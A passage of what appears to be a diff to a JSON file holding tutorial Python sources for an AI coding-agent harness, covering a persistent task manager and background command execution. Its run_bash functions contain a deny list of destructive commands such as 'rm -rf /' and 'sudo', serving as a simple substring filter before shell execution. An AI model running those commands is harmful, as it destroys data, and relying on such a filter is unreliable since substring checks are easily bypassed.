\"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"], kw.get(\"description\", \"\")),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\"), kw.get(\"addBlockedBy\"), kw.get(\"addBlocks\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"task_create\", \"description\": \"Create a new task.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"subject\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\"}}, \"required\": [\"subject\"]}},\n {\"name\": \"task_update\", \"description\": \"Update a task's status or dependencies.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}, \"status\": {\"type\": \"string\", \"enum\": [\"pending\", \"in_progress\", \"completed\"]}, \"addBlockedBy\": {\"type\": \"array\", \"items\": {\"type\": \"integer\"}}, \"addBlocks\": {\"type\": \"array\", \"items\": {\"type\": \"integer\"}}}, \"required\": [\"task_id\"]}},\n {\"name\": \"task_list\", \"description\": \"List all tasks with status summary.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"task_get\", \"description\": \"Get full details of a task by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms07 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: persistent tasks -- goals that outlive any single conversation.\n\"\"\"\ns07_task_system.py - Tasks\n\nTasks persist as JSON files in .tasks/ so they survive context compression.\nEach task has a dependency graph (blockedBy).\n\n .tasks/\n task_1.json {\"id\":1, \"subject\":\"...\", \"status\":\"completed\", ...}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\", ...}\n task_3.json {\"id\":3, \"blockedBy\":[2], ...}\n\n Dependency resolution:\n +----------+ +----------+ +----------+\n | task 1 | --> | task 2 | --> | task 3 |\n | complete | | blocked | | blocked |\n +----------+ +----------+ +----------+\n | ^\n +--- completing task 1 removes it from task 2's blockedBy\n\nKey insight: \"State that survives compression -- because it's outside the conversation.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTASKS_DIR = WORKDIR / \".tasks\"\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use task tools to plan and track work.\"\n\n\n# -- TaskManager: CRUD with dependency graph, persisted as JSON files --\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def _max_id(self) -> int:\n ids = [int(f.stem.split(\"_\")[1]) for f in self.dir.glob(\"task_*.json\")]\n return max(ids) if ids else 0\n\n def _load(self, task_id: int) -> dict:\n path = self.dir / f\"task_{task_id}.json\"\n if not path.exists():\n raise ValueError(f\"Task {task_id} not found\")\n return json.loads(path.read_text())\n\n def _save(self, task: dict):\n path = self.dir / f\"task_{task['id']}.json\"\n path.write_text(json.dumps(task, indent=2, ensure_ascii=False))\n\n def create(self, subject: str, description: str = \"\") -> str:\n task = {\n \"id\": self._next_id, \"subject\": subject, \"description\": description,\n \"status\": \"pending\", \"blockedBy\": [], \"owner\": \"\",\n }\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2, ensure_ascii=False)\n\n def get(self, task_id: int) -> str:\n return json.dumps(self._load(task_id), indent=2, ensure_ascii=False)\n\n def update(self, task_id: int, status: str = None,\n add_blocked_by: list = None, remove_blocked_by: list = None) -> str:\n task = self._load(task_id)\n if status:\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n raise ValueError(f\"Invalid status: {status}\")\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n if add_blocked_by:\n task[\"blockedBy\"] = list(set(task[\"blockedBy\"] + add_blocked_by))\n if remove_blocked_by:\n task[\"blockedBy\"] = [x for x in task[\"blockedBy\"] if x not in remove_blocked_by]\n self._save(task)\n return json.dumps(task, indent=2, ensure_ascii=False)\n\n def _clear_dependency(self, completed_id: int):\n \"\"\"Remove completed_id from all other tasks' blockedBy lists.\"\"\"\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n\n def list_all(self) -> str:\n tasks = []\n files = sorted(\n self.dir.glob(\"task_*.json\"),\n key=lambda f: int(f.stem.split(\"_\")[1])\n )\n for f in files:\n tasks.append(json.loads(f.read_text()))\n if not tasks:\n return \"No tasks.\"\n lines = []\n for t in tasks:\n marker = {\"pending\": \"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}.get(t[\"status\"], \"[?]\")\n blocked = f\" (blocked by: {t['blockedBy']})\" if t.get(\"blockedBy\") else \"\"\n lines.append(f\"{marker} #{t['id']}: {t['subject']}{blocked}\")\n return \"\\n\".join(lines)\n\n\nTASKS = TaskManager(TASKS_DIR)\n\n\n# -- Base tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"], kw.get(\"description\", \"\")),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\"), kw.get(\"addBlockedBy\"), kw.get(\"removeBlockedBy\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"task_create\", \"description\": \"Create a new task.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"subject\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\"}}, \"required\": [\"subject\"]}},\n {\"name\": \"task_update\", \"description\": \"Update a task's status or dependencies.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}, \"status\": {\"type\": \"string\", \"enum\": [\"pending\", \"in_progress\", \"completed\"]}, \"addBlockedBy\": {\"type\": \"array\", \"items\": {\"type\": \"integer\"}}, \"removeBlockedBy\": {\"type\": \"array\", \"items\": {\"type\": \"integer\"}}}, \"required\": [\"task_id\"]}},\n {\"name\": \"task_list\", \"description\": \"List all tasks with status summary.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"task_get\", \"description\": \"Get full details of a task by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms07 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s08", @@ -422,51 +422,51 @@ "classes": [ { "name": "BackgroundManager", - "startLine": 49, - "endLine": 109 + "startLine": 50, + "endLine": 110 } ], "functions": [ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 114 + "startLine": 115 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 120 + "startLine": 121 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 132 + "startLine": 133 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 141 + "startLine": 142 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 150 + "startLine": 151 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 187 + "startLine": 188 } ], "layer": "concurrency", - "source": "#!/usr/bin/env python3\n\"\"\"\ns08_background_tasks.py - Background Tasks\n\nRun commands in background threads. A notification queue is drained\nbefore each LLM call to deliver results.\n\n Main thread Background thread\n +-----------------+ +-----------------+\n | agent loop | | task executes |\n | ... | | ... |\n | [LLM call] <---+------- | enqueue(result) |\n | ^drain queue | +-----------------+\n +-----------------+\n\n Timeline:\n Agent ----[spawn A]----[spawn B]----[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- notification queue --> [results injected]\n\nKey insight: \"Fire and forget -- the agent doesn't block while the command runs.\"\n\"\"\"\n\nimport os\nimport subprocess\nimport threading\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use background_run for long-running commands.\"\n\n\n# -- BackgroundManager: threaded execution + notification queue --\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {} # task_id -> {status, result, command}\n self._notification_queue = [] # completed task results\n self._lock = threading.Lock()\n\n def run(self, command: str) -> str:\n \"\"\"Start a background thread, return task_id immediately.\"\"\"\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"result\": None, \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True\n )\n thread.start()\n return f\"Background task {task_id} started: {command[:80]}\"\n\n def _execute(self, task_id: str, command: str):\n \"\"\"Thread target: run subprocess, capture output, push to queue.\"\"\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300\n )\n output = (r.stdout + r.stderr).strip()[:50000]\n status = \"completed\"\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n status = \"timeout\"\n except Exception as e:\n output = f\"Error: {e}\"\n status = \"error\"\n self.tasks[task_id][\"status\"] = status\n self.tasks[task_id][\"result\"] = output or \"(no output)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id,\n \"status\": status,\n \"command\": command[:80],\n \"result\": (output or \"(no output)\")[:500],\n })\n\n def check(self, task_id: str = None) -> str:\n \"\"\"Check status of one task or list all.\"\"\"\n if task_id:\n t = self.tasks.get(task_id)\n if not t:\n return f\"Error: Unknown task {task_id}\"\n return f\"[{t['status']}] {t['command'][:60]}\\n{t.get('result') or '(running)'}\"\n lines = []\n for tid, t in self.tasks.items():\n lines.append(f\"{tid}: [{t['status']}] {t['command'][:60]}\")\n return \"\\n\".join(lines) if lines else \"No background tasks.\"\n\n def drain_notifications(self) -> list:\n \"\"\"Return and clear all pending completion notifications.\"\"\"\n with self._lock:\n notifs = list(self._notification_queue)\n self._notification_queue.clear()\n return notifs\n\n\nBG = BackgroundManager()\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"background_run\": lambda **kw: BG.run(kw[\"command\"]),\n \"check_background\": lambda **kw: BG.check(kw.get(\"task_id\")),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command (blocking).\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"background_run\", \"description\": \"Run command in background thread. Returns task_id immediately.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"check_background\", \"description\": \"Check background task status. Omit task_id to list all.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"string\"}}}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n # Drain background notifications and inject as system message before LLM call\n notifs = BG.drain_notifications()\n if notifs and messages:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['status']}: {n['result']}\" for n in notifs\n )\n messages.append({\"role\": \"user\", \"content\": f\"\\n{notif_text}\\n\"})\n messages.append({\"role\": \"assistant\", \"content\": \"Noted background results.\"})\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms08 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: background execution -- the model thinks while the harness waits.\n\"\"\"\ns08_background_tasks.py - Background Tasks\n\nRun commands in background threads. A notification queue is drained\nbefore each LLM call to deliver results.\n\n Main thread Background thread\n +-----------------+ +-----------------+\n | agent loop | | task executes |\n | ... | | ... |\n | [LLM call] <---+------- | enqueue(result) |\n | ^drain queue | +-----------------+\n +-----------------+\n\n Timeline:\n Agent ----[spawn A]----[spawn B]----[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- notification queue --> [results injected]\n\nKey insight: \"Fire and forget -- the agent doesn't block while the command runs.\"\n\"\"\"\n\nimport os\nimport subprocess\nimport threading\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use background_run for long-running commands.\"\n\n\n# -- BackgroundManager: threaded execution + notification queue --\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {} # task_id -> {status, result, command}\n self._notification_queue = [] # completed task results\n self._lock = threading.Lock()\n\n def run(self, command: str) -> str:\n \"\"\"Start a background thread, return task_id immediately.\"\"\"\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"result\": None, \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True\n )\n thread.start()\n return f\"Background task {task_id} started: {command[:80]}\"\n\n def _execute(self, task_id: str, command: str):\n \"\"\"Thread target: run subprocess, capture output, push to queue.\"\"\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300\n )\n output = (r.stdout + r.stderr).strip()[:50000]\n status = \"completed\"\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n status = \"timeout\"\n except Exception as e:\n output = f\"Error: {e}\"\n status = \"error\"\n self.tasks[task_id][\"status\"] = status\n self.tasks[task_id][\"result\"] = output or \"(no output)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id,\n \"status\": status,\n \"command\": command[:80],\n \"result\": (output or \"(no output)\")[:500],\n })\n\n def check(self, task_id: str = None) -> str:\n \"\"\"Check status of one task or list all.\"\"\"\n if task_id:\n t = self.tasks.get(task_id)\n if not t:\n return f\"Error: Unknown task {task_id}\"\n return f\"[{t['status']}] {t['command'][:60]}\\n{t.get('result') or '(running)'}\"\n lines = []\n for tid, t in self.tasks.items():\n lines.append(f\"{tid}: [{t['status']}] {t['command'][:60]}\")\n return \"\\n\".join(lines) if lines else \"No background tasks.\"\n\n def drain_notifications(self) -> list:\n \"\"\"Return and clear all pending completion notifications.\"\"\"\n with self._lock:\n notifs = list(self._notification_queue)\n self._notification_queue.clear()\n return notifs\n\n\nBG = BackgroundManager()\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"background_run\": lambda **kw: BG.run(kw[\"command\"]),\n \"check_background\": lambda **kw: BG.check(kw.get(\"task_id\")),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command (blocking).\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"background_run\", \"description\": \"Run command in background thread. Returns task_id immediately.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"check_background\", \"description\": \"Check background task status. Omit task_id to list all.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"string\"}}}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n # Drain background notifications and inject as system message before LLM call\n notifs = BG.drain_notifications()\n if notifs and messages:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['status']}: {n['result']}\" for n in notifs\n )\n messages.append({\"role\": \"user\", \"content\": f\"\\n{notif_text}\\n\"})\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while 